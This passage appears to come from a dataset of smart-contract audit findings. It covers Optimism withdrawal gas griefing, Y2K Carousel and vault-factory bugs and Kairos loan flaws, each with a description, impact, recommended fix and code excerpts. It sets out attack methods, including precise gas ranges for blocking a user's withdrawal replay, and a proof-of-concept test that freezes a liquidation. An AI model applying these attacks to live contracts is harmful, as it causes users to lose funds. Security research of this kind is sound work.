So, after simplification: `G >= [((_minGasLimit + 200) * 64) / 63 + K2 + HashingGas] *(64/63) + 51 + K1`\\nAll in all:\\nTo pass the gas check in OptimismPortal: `G >= ((_minGasLimit * (1016/1000) + messageLength * 16 + 200_000 + 200) * 64) / 63 + K1`\\nTo pass the gas check in L1CrossDomainMessenger: `G >= [((_minGasLimit + 200) * 64) / 63 + K2 + HashingGas] *(64/63) + 51 + K1`\\nIf, `G` is between these two numbers (bigger than the first one, and smaller than the second one), it will pass the check in `OptimismPortal`, but it will revert in `L1CrossDomainMessenger`, as a result it is possible to attack.\\nSince, K1 and K2 are almost equal to 50_000, after simplification:\\n`G >= (_minGasLimit * (1016/1000) + messageLength * 16 ) * (64 / 63) + 253_378`\\n`G >= (_minGasLimit * (64 / 63) + HashingGas) *(64/63) + 101_051`\\nSo it is necessary to satisfy the following condition to be able to attack (in that case it is possible that the attacker provides gas amount between the higher and lower bound to execute the attack): (_minGasLimit * (1016/1000) + messageLength * 16 ) * (64 / 63) + 253_378 < (_minGasLimit * (64 / 63) + HashingGas) *(64/63) + 101_051After simplification, we have:messageLength < (HashingGas - 150_000) / 16`\\nPlease note that the `HashingGas` is a function of `messageLength`. In other words, the consumed gas from Line 304 to 325 is a function of `messageLength`, the longer length the higher gas consumption, but the relation is not linear, it is exponential.**\\nSo, for version zero, the condition can be relaxed to: `messageLength < (HashingGas * 2 - 150_000) / 16`\\nThe calculation shows that if the `messageLength` is equal to 1 mb for version 0, the gas consumed during hashing will be around 23.5M gas (this satisfies the condition above). 
While, if the `messageLength` is equal to 512 kb for version 0, the gas consumed during hashing will be around 7.3M gas (this does not satisfy the condition above marginally).\\nA short summary of calculation is:\\nmessageLength= 128 kb, HashingGas for v1= 508_000, HahingGas for v0= 1_017_287, attack not possible messageLength= 256 kb, HashingGas for v1= 1_290_584, HahingGas for v0= 2_581_168, attack not possible messageLength= 512 kb, HashingGas for v1= 3_679_097, HahingGas for v0= 7_358_194, attack not possible messageLength= 684 kb, HashingGas for v1= 5_901_416, HahingGas for v0= 11_802_831, attack possible messageLength= 1024 kb, HashingGas for v1= 11_754_659, HahingGas for v0= 23_509_318, attack possible\\n\\nWhich can be calculated approximately by:\\n```\\nfunction checkGasV1(bytes calldata _message)\\n public\\n view\\n returns (uint256, uint256)\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas2 = gasleft();\\n return (_message.length, (gas1 - gas2));\\n }\\n```\\n\\n```\\nfunction checkGasV0(bytes calldata _message)\\n public\\n view\\n returns (\\n uint256,\\n uint256,\\n uint256\\n )\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash1 = Hashing.hashCrossDomainMessageV0(\\n address(this),\\n address(this),\\n _message,\\n 0\\n );\\n uint256 gas2 = gasleft();\\n uint256 gas3 = gasleft();\\n bytes32 versionedHash2 = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas4 = gasleft();\\n return (_message.length, (gas1 - gas2), (gas3 - gas4));\\n }\\n```\\n\\nIt means that if for example the `messageLength` is equal to 684 kb (mostly non-zero, only 42 kb zero), and the message is version 0, and for example the `_minGasLimit` is equal to 21000, an attacker can exploit the user's withdrawal transaction by providing a gas meeting the following condition: 
`(_minGasLimit * (1016/1000) + 684 * 1024 * 16 ) * (64 / 63) + 253_378 < G < (_minGasLimit * (64 / 63) + 11_802_831) *(64/63) + 101_051` After, replacing the numbers, the provided gas by the attacker should be: `11_659_592 < G < 12_112_900` So, by providing almost 12M gas, it will pass the check in `OptimismPortal`, but it will revert in `L1CrossDomainMessenger` due to OOG, as a result the user's transaction will not be allowed to be replayed.\\nPlease note that if there is a long time between request of withdrawal transaction on L2 and finalizing withdrawal transaction on L1, it is possible that the gas price is low enough on L1, so economically reasonable for the attacker to execute it.\\nIn Summary:\\nWhen calculating the `baseGas` on L2, only the `minGasLimit` and `message.length` are considered, and a hardcoded overhead is also added. While, the hashing mechanism (due to memory expansion) is exponentially related to the length of the message. It means that, the amount of gas usage during relaying the message can be increased to the level that is higher than calculated value in `baseGas`. So, if the length of the message is long enough (to increase the gas significantly due to memory expansion), it provides an attack surface so that the attacker provides the amount of gas that only pass the condition in `OptimismPortal`, but goes out of gas in `L1CrossDomainMessenger`.","If all the gas is consumed before reaching to L361, the vulnerability is available. So, it is recommended to include memory expansion effect when calculating `baseGas`.","Users will lose fund because it is set as finalized, but not set as failed. 
So, they can not replay it.","```\\nfunction checkGasV1(bytes calldata _message)\\n public\\n view\\n returns (uint256, uint256)\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas2 = gasleft();\\n return (_message.length, (gas1 - gas2));\\n }\\n```\\n" +Funds can be stolen because of incorrect update to `ownerToRollOverQueueIndex` for existing rollovers,high,"In the case where the owner has an existing rollover, the `ownerToRollOverQueueIndex` incorrectly updates to the last queue index. This causes the `notRollingOver` check to be performed on the incorrect `_id`, which then allows the depositor to withdraw funds that should've been locked.\\nIn `enlistInRollover()`, if the user has an existing rollover, it overwrites the existing data:\\n```\\nif (ownerToRollOverQueueIndex[_receiver] != 0) {\\n // if so, update the queue\\n uint256 index = getRolloverIndex(_receiver);\\n rolloverQueue[index].assets = _assets;\\n rolloverQueue[index].epochId = _epochId;\\n```\\n\\nHowever, regardless of whether the user has an existing rollover, the `ownerToRolloverQueueIndex` points to the last item in the queue:\\n```\\nownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n```\\n\\nThus, the `notRollingOver` modifier will check the incorrect item for users with existing rollovers:\\n```\\nQueueItem memory item = rolloverQueue[getRolloverIndex(_receiver)];\\nif (\\n item.epochId == _epochId &&\\n (balanceOf(_receiver, _epochId) - item.assets) < _assets\\n) revert AlreadyRollingOver();\\n```\\n\\nallowing the user to withdraw assets that should've been locked.","The `ownerToRollOverQueueIndex` should be pointing to the last item in the queue in the `else` case only: when the user does not have an existing rollover queue item.\\n```\\n} else {\\n // if not, add to queue\\n rolloverQueue.push(\\n QueueItem({\\n assets: _assets,\\n receiver: 
_receiver,\\n epochId: _epochId\\n })\\n );\\n// Add the line below\\n ownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n}\\n// Remove the line below\\n ownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n```\\n",Users are able to withdraw assets that should've been locked for rollovers.,"```\\nif (ownerToRollOverQueueIndex[_receiver] != 0) {\\n // if so, update the queue\\n uint256 index = getRolloverIndex(_receiver);\\n rolloverQueue[index].assets = _assets;\\n rolloverQueue[index].epochId = _epochId;\\n```\\n" +"When rolling over, user will lose his winnings from previous epoch",high,"When `mintRollovers` is called, when the function mints shares for the new epoch for the user, the amount of shares minted will be the same as the original assets he requested to rollover - not including the amount he won. After this, all these asset shares from the previous epoch are burnt. So the user won't be able to claim his winnings.\\nWhen user requests to `enlistInRollover`, he supplies the amount of assets to rollover, and this is saved in the queue.\\n```\\nrolloverQueue[index].assets = _assets;\\n```\\n\\nWhen `mintRollovers` is called, the function checks if the user won the previous epoch, and proceeds to burn all the shares the user requested to roll:\\n```\\n if (epochResolved[queue[index].epochId]) {\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n // rest of code\\n // @note we know shares were locked up to this point\\n _burn(\\n queue[index].receiver,\\n queue[index].epochId,\\n queue[index].assets\\n );\\n```\\n\\nThen, and this is the problem, the function mints to the user his original assets - `assetsToMint` - and not `entitledShares`.\\n```\\nuint256 assetsToMint = queue[index].assets - relayerFee;\\n_mintShares(queue[index].receiver, _epochId, assetsToMint);\\n```\\n\\nSo the user 
has only rolled his original assets, but since all his share of them is burned, he will not be able anymore to claim his winnings from them.\\nNote that if the user had called `withdraw` instead of rolling over, all his shares would be burned, but he would receive his `entitledShares`, and not just his original assets. We can see in this in `withdraw`. Note that `_assets` is burned (like in minting rollover) but `entitledShares` is sent (unlike minting rollover, which only remints _assets.)\\n```\\n _burn(_owner, _id, _assets);\\n _burnEmissions(_owner, _id, _assets);\\n uint256 entitledShares;\\n uint256 entitledEmissions = previewEmissionsWithdraw(_id, _assets);\\n if (epochNull[_id] == false) {\\n entitledShares = previewWithdraw(_id, _assets);\\n } else {\\n entitledShares = _assets;\\n }\\n if (entitledShares > 0) {\\n SemiFungibleVault.asset.safeTransfer(_receiver, entitledShares);\\n }\\n if (entitledEmissions > 0) {\\n emissionsToken.safeTransfer(_receiver, entitledEmissions);\\n }\\n```\\n","Either remint the user his winnings also, or if you don't want to make him roll over the winnings, change the calculation so he can still withdraw his shares of the winnings.",User will lose his rewards when rolling over.,```\\nrolloverQueue[index].assets = _assets;\\n```\\n +Adversary can break deposit queue and cause loss of funds,high,"Carousel.sol#L531-L538\\n```\\nfunction _mintShares(\\n address to,\\n uint256 id,\\n uint256 amount\\n) internal {\\n _mint(to, id, amount, EMPTY);\\n _mintEmissions(to, id, amount);\\n}\\n```\\n\\nWhen processing deposits for the deposit queue, it _mintShares to the specified receiver which makes a _mint subcall.\\nERC1155.sol#L263-L278\\n```\\nfunction _mint(address to, uint256 id, uint256 amount, bytes memory data) internal virtual {\\n require(to != address(0), ""ERC1155: mint to the zero address"");\\n\\n address operator = _msgSender();\\n uint256[] memory ids = _asSingletonArray(id);\\n uint256[] memory amounts = 
_asSingletonArray(amount);\\n\\n _beforeTokenTransfer(operator, address(0), to, ids, amounts, data);\\n\\n _balances[id][to] += amount;\\n emit TransferSingle(operator, address(0), to, id, amount);\\n\\n _afterTokenTransfer(operator, address(0), to, ids, amounts, data);\\n\\n _doSafeTransferAcceptanceCheck(operator, address(0), to, id, amount, data);\\n}\\n```\\n\\nThe base ERC1155 _mint is used which always behaves the same way that ERC721 safeMint does, that is, it always calls _doSafeTrasnferAcceptanceCheck which makes a call to the receiver. A malicious user can make the receiver always revert. This breaks the deposit queue completely. Since deposits can't be canceled this WILL result in loss of funds to all users whose deposits are blocked. To make matters worse it uses first in last out so the attacker can trap all deposits before them",Override _mint to remove the safeMint behavior so that users can't DOS the deposit queue,Users who deposited before the adversary will lose their entire deposit,"```\\nfunction _mintShares(\\n address to,\\n uint256 id,\\n uint256 amount\\n) internal {\\n _mint(to, id, amount, EMPTY);\\n _mintEmissions(to, id, amount);\\n}\\n```\\n" +Controller doesn't send treasury funds to the vault's treasury address,medium,"The Controller contract sends `treasury` funds to its own immutable `treasury` address instead of sending the funds to the one stored in the respective vault contract.\\nEach vault has a treasury address that is assigned on deployment which can also be updated through the factory contract:\\n```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) SemiFungibleVault(IERC20(_assetAddress), _name, _symbol, _tokenURI) {\\n // // rest of code\\n treasury = _treasury;\\n whitelistedAddresses[_treasury] = true;\\n }\\n\\n function setTreasury(address _treasury) public onlyFactory {\\n if (_treasury == address(0)) revert AddressZero();\\n treasury = _treasury;\\n }\\n```\\n\\nBut, the Controller, responsible for 
sending the fees to the treasury, uses the immutable treasury address that it was initialized with:\\n```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) {\\n // // rest of code\\n treasury = _treasury;\\n }\\n\\n // @audit just one example. Search for `treasury` in the Controller contract to find the others\\n function triggerEndEpoch(uint256 _marketId, uint256 _epochId) public {\\n // // rest of code\\n \\n // send premium fees to treasury and remaining TVL to collateral vault\\n premiumVault.sendTokens(_epochId, premiumFee, treasury);\\n // strike price reached so collateral is entitled to collateralTVLAfterFee\\n premiumVault.sendTokens(\\n _epochId,\\n premiumTVLAfterFee,\\n address(collateralVault)\\n );\\n\\n // // rest of code\\n }\\n```\\n","The Controller should query the Vault to get the correct treasury address, e.g.:\\n```\\ncollateralVault.sendTokens(_epochId, collateralFee, collateralVault.treasury());\\n```\\n",It's not possible to have different treasury addresses for different vaults. It's also not possible to update the treasury address of a vault although it has a function to do that. Funds will always be sent to the address the Controller was initialized with.,"```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) SemiFungibleVault(IERC20(_assetAddress), _name, _symbol, _tokenURI) {\\n // // rest of code\\n treasury = _treasury;\\n whitelistedAddresses[_treasury] = true;\\n }\\n\\n function setTreasury(address _treasury) public onlyFactory {\\n if (_treasury == address(0)) revert AddressZero();\\n treasury = _treasury;\\n }\\n```\\n" +User deposit may never be entertained from deposit queue,medium,"Due to FILO (first in last out) stack structure, while dequeuing, the first few entries may never be retrieved. 
These means User deposit may never be entertained from deposit queue if there are too many deposits\\nAssume User A made a deposit which becomes 1st entry in `depositQueue`\\nPost this X more deposits were made, so `depositQueue.length=X+1`\\nRelayer calls `mintDepositInQueue` and process `X-9` deposits\\n```\\n while ((length - _operations) <= i) {\\n // this loop impelements FILO (first in last out) stack to reduce gas cost and improve code readability\\n // changing it to FIFO (first in first out) would require more code changes and would be more expensive\\n _mintShares(\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n emit Deposit(\\n msg.sender,\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n depositQueue.pop();\\n if (i == 0) break;\\n unchecked {\\n i--;\\n }\\n }\\n```\\n\\nThis reduces deposit queue to only 10\\nBefore relayer could process these, Y more deposits were made which increases deposit queue to `y+10`\\nThis means Relayer might not be able to again process User A deposit as this deposit is lying after processing `Y+9` deposits","Allow User to dequeue deposit queue based on index, so that if such condition arises, user would be able to dequeue his deposit (independent of relayer)",User deposit may remain stuck in deposit queue if a large number of deposit are present in queue and relayer is interested in dequeuing all entries,"```\\n while ((length - _operations) <= i) {\\n // this loop impelements FILO (first in last out) stack to reduce gas cost and improve code readability\\n // changing it to FIFO (first in first out) would require more code changes and would be more expensive\\n _mintShares(\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n emit Deposit(\\n msg.sender,\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n depositQueue.pop();\\n if (i == 0) break;\\n unchecked {\\n i--;\\n }\\n }\\n```\\n" +changeTreasury() Lack of check 
and remove old,medium,"changeTreasury() Lack of check and remove old\\nchangeTreasury() used to set new treasury The code is as follows:\\n```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n\\nThe above code has the following problem:\\nno check whether the new treasury same as the old. If it is the same, the whitelist will be canceled.\\nUse setTreasury(VaultFactoryV2.treasury), it should be setTreasury(_treasury)\\nnot cancel old treasury from the whitelist","```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n+ require(vaults[0].treasury() !=_treasury,""same""); //check same\\n+ IVaultV2(vaults[0]).whiteListAddress(vaults[0].treasury()); //cancel old whitelist\\n+ IVaultV2(vaults[1]).whiteListAddress(vaults[1].treasury()); //cancel old whitelist\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n+ IVaultV2(vaults[0]).setTreasury(_treasury);\\n+ IVaultV2(vaults[1]).setTreasury(_treasury);\\n- IVaultV2(vaults[0]).setTreasury(treasury);\\n- IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n",whiteListAddress abnormal,"```\\n function 
changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n" +mintRollovers should require entitledShares >= relayerFee,medium,"mintRollovers should require entitledShares >= relayerFee\\nIn mintRollovers, the rollover is only not skipped if queue[index].assets >= relayerFee,\\n```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n if (queue[index].assets < relayerFee) {\\n index++;\\n continue;\\n }\\n```\\n\\nIn fact, since the user is already profitable, entitledShares is the number of assets of the user, which is greater than queue[index].assets, so it should check that entitledShares >= relayerFee, and use entitledShares instead of queue[index].assets to subtract relayerFee when calculating assetsToMint later.",Change to\\n```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n// Remove the line below\\n if (queue[index].assets < relayerFee) {\\n// Add the line below\\n if (entitledShares < relayerFee) {\\n index// Add the line below\\n// Add the line below\\n;\\n continue;\\n }\\n// rest of code\\n// Remove the line below\\n uint256 assetsToMint = queue[index].assets // Remove the line below\\n relayerFee;\\n// Add the line below\\n uint256 assetsToMint = entitledShares // Remove the line below\\n relayerFee;\\n```\\n,This will prevent rollover even if the user 
has more assets than relayerFee,```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n if (queue[index].assets < relayerFee) {\\n index++;\\n continue;\\n }\\n```\\n +Vault Factory ownership can be changed immediately and bypass timelock delay,medium,"The VaultFactoryV2 contract is supposed to use a timelock contract with a delay period when changing its owner. However, there is a loophole that allows the owner to change the owner address instantly, without waiting for the delay period to expire. This defeats the purpose of the timelock contract and exposes the VaultFactoryV2 contract to potential abuse.\\nIn project description, timelock is required when making critical changes. Admin can only configure new markets and epochs on those markets.\\n```\\n 2) Admin can configure new markets and epochs on those markets, Timelock can make cirital changes like changing the oracle or whitelisitng controllers.\\n```\\n\\nThe VaultFactoryV2 contract has a `changeOwner` function that is supposed to be called only by the timelock contract with a delay period.\\n```\\nfunction changeOwner(address _owner) public onlyTimeLocker {\\n if (_owner == address(0)) revert AddressZero();\\n _transferOwnership(_owner);\\n }\\n```\\n\\nThe VaultFactoryV2 contract inherits from the Openzeppelin Ownable contract, which has a `transferOwnership` function that allows the owner to change the owner address immediately. However, the `transferOwnership` function is not overridden by the `changeOwner` function, which creates a conflict and a vulnerability. 
The owner can bypass the timelock delay and use the `transferOwnership` function to change the owner address instantly.\\n```\\n function transferOwnership(address newOwner) public virtual onlyOwner {\\n require(newOwner != address(0), ""Ownable: new owner is the zero address"");\\n _transferOwnership(newOwner);\\n }\\n```\\n",Override the `transferOwnership` function and add modifier `onlyTimeLocker`.,"The transferOwnership is not worked as design (using timelock), the timelock delay become useless. This means that if the owner address is hacked or corrupted, the attacker can take over the contract immediately, leaving no time for the protocol and the users to respond or intervene.","```\\n 2) Admin can configure new markets and epochs on those markets, Timelock can make cirital changes like changing the oracle or whitelisitng controllers.\\n```\\n" +VaultFactoryV2#changeTreasury misconfigures the vault,medium,"VaultFactoryV2#changeTreasury misconfigures the vault because the setTreasury subcall uses the wrong variable\\nVaultFactoryV2.sol#L228-L246\\n```\\nfunction changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n{\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n}\\n```\\n\\nWhen setting the treasury for the underlying vault pair it accidentally use the treasury variable instead of _treasury. 
This means it uses the local VaultFactoryV2 treasury rather than the function input.\\nControllerPeggedAssetV2.sol#L111-L123\\n```\\n premiumVault.sendTokens(_epochId, premiumFee, treasury);\\n premiumVault.sendTokens(\\n _epochId,\\n premiumTVL - premiumFee,\\n address(collateralVault)\\n );\\n // strike price is reached so collateral is still entitled to premiumTVL - premiumFee but looses collateralTVL\\n collateralVault.sendTokens(_epochId, collateralFee, treasury);\\n collateralVault.sendTokens(\\n _epochId,\\n collateralTVL - collateralFee,\\n address(premiumVault)\\n );\\n```\\n\\nThis misconfiguration can be damaging as it may cause the triggerDepeg call in the controller to fail due to the sendToken subcall. Additionally the time lock is the one required to call it which has a minimum of 3 days wait period. The result is that valid depegs may not get paid out since they are time sensitive.",Set to _treasury rather than treasury.,Valid depegs may be missed due to misconfiguration,"```\\nfunction changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n{\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n}\\n```\\n" +Null epochs will freeze rollovers,medium,"When rolling a position it is required that the user didn't payout on the last epoch. 
The issue with the check is that if a null epoch is triggered then rollovers will break even though the vault didn't make a payout\\nCarousel.sol#L401-L406\\n```\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n```\\n\\nWhen minting rollovers the following check is made so that the user won't automatically roll over if they made a payout last epoch. This check however will fail if there is ever a null epoch. Since no payout is made for a null epoch it should continue to rollover but doesn't.",Change to less than or equal to:\\n```\\n- if (entitledShares > queue[index].assets) {\\n+ if (entitledShares >= queue[index].assets) {\\n```\\n,Rollover will halt after null epoch,"```\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n```\\n" +Inconsistent use of epochBegin could lock user funds,medium,"The epochBegin timestamp is used inconsistently and could lead to user funds being locked.\\nThe function `ControllerPeggedAssetV2.triggerNullEpoch` checks for timestamp like this:\\n```\\nif (block.timestamp < uint256(epochStart)) revert EpochNotStarted();\\n```\\n\\nThe modifier `epochHasNotStarted` (used by Carousel.deposit) checks it like this:\\n```\\nif (block.timestamp > epochConfig[_id].epochBegin)\\n revert EpochAlreadyStarted();\\n```\\n\\nBoth functions can be called when `block.timestamp == epochBegin`. This could lead to a scenario where a deposit happens after `triggerNullEpoch` is called (both in the same block). Because `triggerNullEpoch` sets the value for `finalTVL`, the TVL that comes from the deposit is not accounted for. 
If emissions have been distributed this epoch, this will lead to the incorrect distribution of emissions and once all emissions have been claimed the remaining assets will not be claimable, due to reversion in `withdraw` when trying to send emissions:\\n```\\nfunction previewEmissionsWithdraw(uint256 _id, uint256 _assets)\\n public\\n view\\n returns (uint256 entitledAmount)\\n{\\n entitledAmount = _assets.mulDivDown(emissions[_id], finalTVL[_id]);\\n}\\n// rest of code\\n//in withdraw:\\nuint256 entitledEmissions = previewEmissionsWithdraw(_id, _assets);\\nif (epochNull[_id] == false) {\\n entitledShares = previewWithdraw(_id, _assets);\\n} else {\\n entitledShares = _assets;\\n}\\nif (entitledShares > 0) {\\n SemiFungibleVault.asset.safeTransfer(_receiver, entitledShares);\\n}\\nif (entitledEmissions > 0) {\\n emissionsToken.safeTransfer(_receiver, entitledEmissions);\\n}\\n```\\n\\nThe above could also lead to revert through division by 0 if `finalTVL` is set to 0, even though the deposit after was successful.",The modifier `epochHasNotStarted` should use `>=` as comparator,"incorrect distribution, Loss of deposited funds",```\\nif (block.timestamp < uint256(epochStart)) revert EpochNotStarted();\\n```\\n +Denial-of-Service in the liquidation flow results in the collateral NTF will be stuck in the contract.,medium,"If the `loanTovalue` value of the offer is extremely high, the liquidation flow will be reverted, causing the collateral NTF to persist in the contract forever.\\nThe platform allows users to sign offers and provide funds to those who need to borrow assets.\\nIn the first scenario, the lender provided an offer that the `loanTovalue` as high as the result of the `shareMatched` is `0`. 
For example, if the borrowed amount was `1e40` and the offer had a `loanTovalue` equal to `1e68`, the share would be `0`.\\nAs a result, an arithmetic error (Division or modulo by 0) will occur in the `price()` function at line 50 during the liquidation process.\\nIn the second scenario, if the lender's share exceeds `0`, but the offer's `loanToValue` is extremely high, the `price()` function at line 54 may encounter an arithmetic error(Arithmetic over/underflow) during the `estimatedValue` calculation.\\nPoof of Concept\\nkairos-contracts/test/BorrowBorrow.t.sol\\n```\\nfunction testBorrowOverflow() public {\\n uint256 borrowAmount = 1e40;\\n BorrowArg[] memory borrowArgs = new BorrowArg[](1);\\n (, ,uint256 loanId , ) = kairos.getParameters();\\n loanId += 1;\\n\\n Offer memory offer = Offer({\\n assetToLend: money,\\n loanToValue: 1e61,\\n duration: 1,\\n expirationDate: block.timestamp + 2 hours,\\n tranche: 0,\\n collateral: getNft()\\n });\\n uint256 currentTokenId;\\n\\n getFlooz(signer, money, getOfferArg(offer).amount);\\n\\n {\\n OfferArg[] memory offerArgs = new OfferArg[](1);\\n currentTokenId = getJpeg(BORROWER, nft);\\n offer.collateral.id = currentTokenId;\\n offerArgs[0] = OfferArg({\\n signature: getSignature(offer),\\n amount: borrowAmount,\\n offer: offer\\n });\\n borrowArgs[0] = BorrowArg({nft: NFToken({id: currentTokenId, implem: nft}), args: offerArgs});\\n }\\n\\n vm.prank(BORROWER);\\n kairos.borrow(borrowArgs);\\n\\n assertEq(nft.balanceOf(BORROWER), 0);\\n assertEq(money.balanceOf(BORROWER), borrowAmount);\\n assertEq(nft.balanceOf(address(kairos)), 1);\\n\\n vm.warp(block.timestamp + 1);\\n Loan memory loan = kairos.getLoan(loanId);\\n console.log(""price of loanId"", kairos.price(loanId));\\n}\\n```\\n",We recommend adding the mechanism during the borrowing process to restrict the maximum `loanToValue` limit and ensure that the lender's share is always greater than zero. 
This will prevent arithmetic errors.,"The loan position will not be liquidated, which will result in the collateral NTF being permanently frozen in the contract.","```\\nfunction testBorrowOverflow() public {\\n uint256 borrowAmount = 1e40;\\n BorrowArg[] memory borrowArgs = new BorrowArg[](1);\\n (, ,uint256 loanId , ) = kairos.getParameters();\\n loanId += 1;\\n\\n Offer memory offer = Offer({\\n assetToLend: money,\\n loanToValue: 1e61,\\n duration: 1,\\n expirationDate: block.timestamp + 2 hours,\\n tranche: 0,\\n collateral: getNft()\\n });\\n uint256 currentTokenId;\\n\\n getFlooz(signer, money, getOfferArg(offer).amount);\\n\\n {\\n OfferArg[] memory offerArgs = new OfferArg[](1);\\n currentTokenId = getJpeg(BORROWER, nft);\\n offer.collateral.id = currentTokenId;\\n offerArgs[0] = OfferArg({\\n signature: getSignature(offer),\\n amount: borrowAmount,\\n offer: offer\\n });\\n borrowArgs[0] = BorrowArg({nft: NFToken({id: currentTokenId, implem: nft}), args: offerArgs});\\n }\\n\\n vm.prank(BORROWER);\\n kairos.borrow(borrowArgs);\\n\\n assertEq(nft.balanceOf(BORROWER), 0);\\n assertEq(money.balanceOf(BORROWER), borrowAmount);\\n assertEq(nft.balanceOf(address(kairos)), 1);\\n\\n vm.warp(block.timestamp + 1);\\n Loan memory loan = kairos.getLoan(loanId);\\n console.log(""price of loanId"", kairos.price(loanId));\\n}\\n```\\n" +Adversary can utilize a large number of their own loans to cheat other lenders out of interest,medium,"The minimal interest paid by a loan is scaled by the number of provisions that make up the loan. 
By inflating the number of provisions with their own provisions then can cause legitimate lenders to receive a much lower interest rate than intended.\\nClaimFacet.sol#L94-L106\\n```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent;\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n\\nIf a loan is paid back before the minimal interest rate has been reached then each provision will receive the unweighted minimal interest amount. This can be abused to take loans that pay legitimate lenders a lower APR than expected, cheating them of their yield.\\nExample: A user wishes to borrow 1000 USDC at 10% APR. Assume the minimal interest per provision is 10 USDC and minimum borrow amount is 20 USDC. After 1 year the user would owe 100 USDC in interest. A user can abuse the minimum to pay legitimate lenders much lower than 10% APR. The attacker will find a legitimate offer to claim 820 USDC. This will create an offer for themselves and borrow 20 USDC from it 9 times. This creates a total of 10 provisions each owed a minimum of 10 USDC or 100 USDC total. 